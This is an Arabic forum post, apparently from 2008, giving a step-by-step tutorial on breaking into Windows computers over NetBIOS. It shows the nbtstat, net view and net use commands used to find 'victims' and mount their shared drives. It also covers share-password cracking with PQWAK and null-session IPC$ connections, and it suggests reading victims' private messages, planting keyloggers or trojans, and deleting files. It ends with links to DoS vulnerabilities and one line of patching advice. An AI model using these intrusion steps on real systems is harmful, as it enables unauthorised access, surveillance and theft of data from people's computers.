[ شرح ] nbtstat

تم تحميل الصفحة في 0,9231466 ثانية
nbtstat
الحالة
مغلق و غير مفتوح للمزيد من الردود.
إنضم
20 يوليو 2008
المشاركات
4
الإعجابات
1
النقاط
0
الإختراق باستخدام NetBIOS
السلام عليكم ورحمة الله وبركاته

كيف الشباب انشالله كلو تمام .. اليوم اقدم لكم درس عن الإختراق باستخدام النت بيوس ... انشالله يعجبكم

محتويات الدرس :

1 -نبذة مختصرة عن الـ NetBIOS

2 - أمر NBTSTAT

3 - ماذا تحتاج للقيام بالأختراق

4 - أنواع الهجوم بأستخدام النت بيوس

5 - كيفية البحث عن الضحية

6 - الهجوم باستخدام طريقة القراة والكتابة في جهاز الضحية

7 - كسر باسوورد الـمشاركة

8 - أستخدام( IPC$ ) للهجوم على وندوز NT

9 - الإختراق في حاسب الضحية

10 - هجوم حجب الخدمة Denial of service
-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\

1 : نبذة مختصرة عن الـ NetBIOS
~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~

الـNetBIOS هو أختصار لـ(Network Basic Input Output System) . طور النت بيوس بشكل
اساسي من قبل IBM و Sytek كتطبيق لبرمجة الواجهه لبرنامج الزبون client للدخول الى الشبكات المحلية LAN
وهو ما يسمى ب(API) وهو اختصار لـ Application Programming Interface .
اذا كنت قد جربت العمل على الشبكات المحلية بإستخدام انظمة تشغيل Windows مثل (like Windows98 , Windows Me, Windows NT الخ..)
فإنة من المؤكد أنك ضغطت على أيقونة "Network Neighborhood" الموجودة الموجودة بالنظام للإتصال بأجهزة الكمبيوتر المتصلة
بشبكتك المحلية .
فبعد ضغطك على الأيقونة سترى اسماء الأجهزة الموجودة على الشبكة . فهل تعلم ماذا يحدث بالضبط عند ضغطك على "Network Neighborhood"؟؟
الجواب هو أن جهازك يحاول أخذ اسماء الأجهزة المرتبطة بالشبكة بإصدار أمر الـNetBIOS .
اذا الـNetBIOS يعطي أسماء اجهزة الحاسب المسجلة في الشبكة.
بإختصار الNetBIOS يعطيك معلومات متنوعة عن الأجهزة الموجودة بالشبكة . وهذه المعلومات تتظمن :

أسم الجهاز المتصل - اسم المستخدم - Domain اسم النطاق ومعلومات اخرى...

ومثل أي خدمة تعمل من خلال منفذ معين -كخدمة الـFinger مثلا - .فإن خدمة النت بيوس NetBIOS تعمل من خلال المنفذ Port رقم 139 .

-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\

2 - أمر NBTSTAT :
~~~~~~~~~~~~~~~~
يمكنك ان تتفاعل مع النت بيوس بمساعدة الأمر NBTSTAT .
ولإستحدام هذا الأمر أضغط على " ابدأ " ثم "تسغيل " وأكتب أمر command للدخول الى محث أوامر الدوس MS DOS

وبعدها ستدخل على الدوس وهنالك بعض الأمور التي تسهل عليك استخدام الدوس سأذكرها وهي :
- اذا ار&##1583;ت الخروج من الدوس اكتب الأمر exit
- اذا ار&##1583;ت تكبير محث اوامر الدوس بحيث يملي الشاشة اضغط على ALT+ENTER في نفس الوقت واذا اردت التصغير ايضا اضغط على ALT+ENTER

اذن دعنا نكمل الدرس ..

عند دخولك للدوس سوف يظهر لك
c:\windows>
اذا لم تجد windows بعد c:\ فلا تقلق وتابع الدرس
الآن دعنا نعمل بأمر NBTSTAT
اذا اردت ان تعرف اكثر عن الNBTSTAT اكتب في محث الدوس هذا الأمر NBTSTAT/? :
c:\windows>nbtstat/?
واذا اردت ان تعرف معلومات النت بيوس لجهازك اكتب الأمر الآتي :
c:\windows>nbtstat -a 127.0.0.1
هذا لأمر سيسرد لك قائمة بمعلومات النت بيوس لجهازك
انظر لهذا المثال كنموذج :

NetBIOS Remote Machine Name Table

Name Number Type Usage

=========================
=========================
========

workgroup 00 G Domain Name

my_computer 03 U Messenger Service

myusername 03 U Messenger Service


MAC Address = 00-02-44-14-23-E6


الـ "Name " يظهر اسم النت بيوس لجهازك و اما "Number" فيبين رقم المخصص للمشاركة (اما بالملفات او الطابعة) وهي هنا 6

ومن الممكن ان ترى اسماء اخرى اضافية غير ال(my_computer و myusername)

اما أذا اردت معرفة اسماء النت بيوس لجهاز بعيد فإنه يمكنك ذلك باستخدام هذا الأمر:

c:\windows>nbtstat -a ipaddress

ipaddress هنا يمثل ايبي الجهاز المراد معرف اسماء النت بيوس لدية مثلا نريد معرفة اسماء نت بيوس هذا الأيبي 203.195.136.156 فإننا سنكتب هذا لأمر

c:\windows>nbtstat -a 203.195.136.156

-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\

3 - ماذا تحتاج للقيام بالأختراق:
~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~

كل ما تحتاجه هو نظام تشغيل لوندوز مثل وندوز 98 و ME ولكن الأفضل Windows NT, 2000, XP
وتحتاج ايضا اتصال بشبكة الأنترنت

-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\

4 - أنواع الهجوم بأستخدام النت بيوس:
~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~

لدينا نوعين من انواع الهجوم على الأجهزة البعيدة بأستخدام الـ NetBIOS وهي :

1 . القراة والكتابة في جهاز الضحية
2 . الهجوم من نوع DOS وهو ما يسمى بـهجوم حجب الخدمة Denial of Service
وسوف أقوم بشرح وجيز لهم في هذا الدرس بإذن الله
-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\

5 - البحث عن الضحية:
~~~~~~~~~~~~~~~~~~~~

يمكنك البحث عن الضحية باستخدام " nbtstat -a ipaddress " وبعدها ستظهر الشبكة الآيبيات \\ipaddress
فإذا لم تنجح في تجربة الآي بي الأول حاول في الثاني حتى تصل الى الآي بي المناسب لأختراقة
وهنالك طريقة اخرى أفضل وأسهل وهي البحث بإستخدام port scanner - وهو برنامج بسيط يبحث في الآيبيات عن البورتات المفتوحة -
كبرنامج "Orge" الذي يبحث عن بورت النت بيوس في الأجهزة البعيدة


-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\

6 - الهجوم باستخدام طريقة القراة والكتابة في جهاز الضحية :
~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~

صدق او لا تصدق ان الهجوم باستخدام النت بيوس من أسهل طرق الهكرز في الأختراق .
ولكن لكي تقوم بالإختراق يجب ان يكون الضحية مفعِّلا لخدمة المشاركة بالملفات والطابعة في جهازه .
اذا قام الضحية بتفعيل هذه الخدمة فإن امر NBTSTAT سيظهر لك أسم أو اكثر للـNetBIOS
الآن دعنا نقوم بمثال :

دعنا نفترض انك تعرف رقم IP وليكن 203.195.136.156 لجهاز مفعل خدمة المشاركة بالملفات والطابعة "File And Printer Sharing "

لكي تعرف أكثر عن الـ IP Address اضغط هنا http://www.shammel.net/laern/whatip.htm .

والآن سنقوم بمعرفة اسم النت بيوس للضحية بكتابة هذا الأمر :

c:\windows>nbtstat -a 203.195.136.156

بعد الضغط على زر الإدخال سيظهر لك هذا ( كمثال ) :
NetBIOS Remote Machine Name Table

Name Type Status
--------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered


MAC Address = 00-02-44-14-23-E6

الرقم <20> يدل هنا على ان المستخدم user قام بتفعيل خدمة المشاركة بالملفات والطابعه "File And Printer Sharing"

----------------------------------------------------------------
ملاحظة : اذا لم يظهر لك الرقم 20 فإنة لديك احتمالان :
1 . ان الضحية لم يقوم بتفعيل المشاركة بالملفات والطابعة
2 . ان الجملة هذه قد ظهرت لك "Host Not found" وذلك بسبب ان البورت 139 مغلق او أن الآي بي ليس موجود .
----------------------------------------------------------------

والآن خطوتنا التالية هي اظهار الملفات التي يشارك بها الضحيه
وللقيام بهذه الخطوة سنستخدم هذا الأمر:
c:\windows>net view \\203.195.136.156

سيظهر لنا هذا كمثال:
|========================
=========================
=========
|
|Shared resources at \\203.195.136.156
|هنا سيأتي اسم الكمبيوتر
|
|Share name Type Used as Comment
|
|-----------------------------------------------------------------------------------------------
|CDISK Disk
|========================
=========================
=========

" Disk " يظهر ان الضحية يشارك بdisk أسمة CDISK . وهذه في حالة ان الضحية يتشارك بملفات معينة

اما اذا كان الضحية يشارك بالطابعة فإنة سيظهر لنا الآتي :

|========================
=========================
=========
|Shared resources at \\203.195.136.156
|
|
|هنا سيأتي اسم الكمبيوتر
|
|Share name Type Used as Comment
|
| ------------------------------------------------------------------------------------------------
|HP-6L Print
|========================
=========================
=========


"Print " يظهر ان الضحية يتشارك بالطابعة وأسمها هنا هو "HP-6L"

اذا كنا نستطيع مشاركة الضحية في الملفات أو الطابعة فإنة يمكننا قرائة ملفاته والكتابة والتغيير فيها
وبإستطاعتنا ايضاً طباعة اي شي على طابعة الضحية .

والآن دعنا نشارك الضحية203.195.136.156 بملفاتة الموجودة بالقرص CDISK

سوف نتصل بهاردسك الضحية وبعد اتصالنا به بنجاح ستظهر لنا سواقة (drive) الضحية وبعد الضغط عليها
سنرى محتويات السواقة من ملفات تحتوي صور وملفات نصية وغيرها .

وللقيام بذلك سنستخدم الأمر NET

دعنا نفترض اننا نريد صنع سواقة اسمها g: في الجهاز ونجعل هذه السواقة تتصل بما يشارك به الضحية
وللقيام بهذا سنكتب هذا الأمر

c:\windows>net use g: \\203.195.136.156\CDISK
ملاحظة : ليس شرطا ان تكون السواقة g: بأستطاعتك تغييره الى اي حرف اخر

اذا كان الأمر صحيحا فسوف تظهر لك هذه الرساله التأكيدية
The command was completed successfully

الآن اضغط دبل كليك على جهاز الكمبيوتر ثم على السواقة g: التي صنعتها وبها ستجد ملفات الضحية

من هنا تستطيع رؤية الملفات وايضاً الكتابة والتغيير فيها ... ;)

-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\

7 - كسر باسوورد الـمشاركة:
~~~~~~~~~~~~~~~~~~~~~~~~~
~

بعض الأحيان عند استخدامك لهذا لأمر "net use k: \\ipaddress\sharename" سوف يطلب منك الباسوورد ليسمح لك بالدخول الى ملفات الضحية .
ومن الطبيعي انك لا تعرف الباسوورد ولمعرفة الباسوورد هنالك كاسر للباسوورد اسمة "PQWAK" وكل ما تحتاجة في هذا البرنامج هو أدخال الآي بي
وأسم ملف المشاركة (the share name) وهو بدورة سيقوم بحل شفرة الباسوورد على ثانية .
لاحظ انه بإستطاعتك فقط كسر الباسوورد في انظمة التشغيل الآتية :
Windows 95

Windows 98

Windows Me

-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\

8 - أستخدام( IPC$ ) للهجوم على وندوز NT:
~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~

الآن يتحتم عليك التفكير بطريقة لكسر باسووردات المشاركة على انظمة تشغيل قامة على وندوز NT او وندوز 2000
فإذا يأست من ايجاد الحل فهذه هي الطريقة وهي استخدام IPC$

على كلن IPC$ ليس بكاسر للباسوورد وإنما هو ببساطة مجموعة من الحروف تجعل تتصل بنظام الضحية على هية ضيف " guest" بحيث لا يسألك عن الباسوورد

وللقيام بذلك أكتب هذا الأمر:

c:\windows>net use g: \\123.123.123.123\ipc$ "" /user:""

بإستطاعتك تغيير الحرف "g" الى اي حرف تريد . ولكن عند تغييرك لحرف السواقة(drive) فإنك بهذا التغيير ستوجد سواقة جديدة بنفس الحرف الذي اخترت.

لاحظ انك لن تستطيع الإتصال بسواقات الضحية ولكنك ستجمع معلومات ثمينة مثل أسماء المستخدمين ، والمستخدمين الذين سبق وأن قاموا بتسجيل الدخول ، او معلومات اخرى .

ولدينا مثال لواحده من الأدوات التي تستخدم طريقة ipc$ وهي أداة "Internet Periscope"

-----------------------------------
نبذة عن "Internet Periscope":

ماهي اداة الـInternet Periscope ؟
هي أداة لمديرين النظام "Administrators" أو مهندسين الشبكات أو أي شخص مسؤول عن المراقبة و ضمان امن المكائن على شبكة الأنترنت
ان أداة "InternetPeriscope " تقوم بعدة وظائف منها :
- مراقبⴹ سيرفرات الويب وسيرفرات SMTP و POP و DNS وجميع المكائن الموجودة على الإنترنت وتجعلك تعرف اذا كانت المكينة او السيرفر تعمل بشكل صحيح وتخبرك اذا كانت هناك مشاكل .
- تكشف ل&##1603; محاولات الهكر لإختراقك وفي الوقت نفسة توفر لك معلومات عنه مثل اسمة وعنوانه ورقم هاتفه و عنوان البريد الإلكتروني المتوفر له من موفر خدمة الأنترنت لدية ISP
وغيرها من الوضائف المختلفة ,,,

اذا كنت مهتم بمعرفة التفاصيل فإنة يمكنك معرفة الكثير عن Internet Periscope عن طريق هذا الرابط :
http://www.lokbox.net/internetperiscope.asp
-----------------------------------

-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\

9 - الإختراق في حاسب الضحية:
~~~~~~~~~~~~~~~~~~~~~~~~~
~~

وانت مخترق لجهاز الضحية بإستطاعتك رؤية رسائلة الشخصية ;) او حتى الإستماع الى الموسيقى الموجودة بجهازة
ولكن اذا اردت الإستمتاع الكلي بأختراقك للضحية فإنة حينها بأستطاعتك القيام ببعض الأمور كتنصيب برنامج Key Logger (والأكثرية تعرف ماوظيفتة)
او حتى تشغيل تروجان ما في جهاز الضحية أو حذف او نسخ لملفاته ..


-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\

10 - هجوم حجب الخدمة Denial of service:
~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~

هذا النوع من الهجمات يتظمن استخدام نظام التشغيل لينكس وترجمة(compiling) للملفات المكتوبة بلغة C
أشهر ضعفين في الأنظمة (vulnerabilities) موجودين لـNetBIOS هما :

Vulnerability 1
http://online.securityfocus.com/bid/1163

Vulnerability 2
http://online.securityfocus.com/bid/1780

وهذان الرابطين يشرحان لك طريقة عملهم وكيفيك تبيقها .

-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\

11 - كيف تحمي نفسك :
~~~~~~~~~~~~~~~~~~~~

للحماية من مضار الNetBIOS قم بتحديث نظام الوندوز لديك من خلال هذا الموقع
windowsupdate.microsoft.com


-------------------------------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
\\\\\\\\\\\\\\\\\
لمعلومات اكثر عن النت بيوس ادخل هذا الرابط
http://www.arabsmag.com/hacking/sites/arabic/Net-Bios.txt

النهاية::..

اتمنى ان الدرس قد أفادكم وأضاف الى حصيلتكم المعلوماتية بعض المعلومات عن النت بيوس

تقبلوا تحياتي أخوكم quiet manner

 
إنضم
28 سبتمبر 2008
المشاركات
612
الإعجابات
30
النقاط
0
رد: nbtstat

||~ مآقصررت تسسلم يـآبطل ..

وجآري تكملـة الدررس + آحلى تقييم إن سمـح بـهٍ .. :9:
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل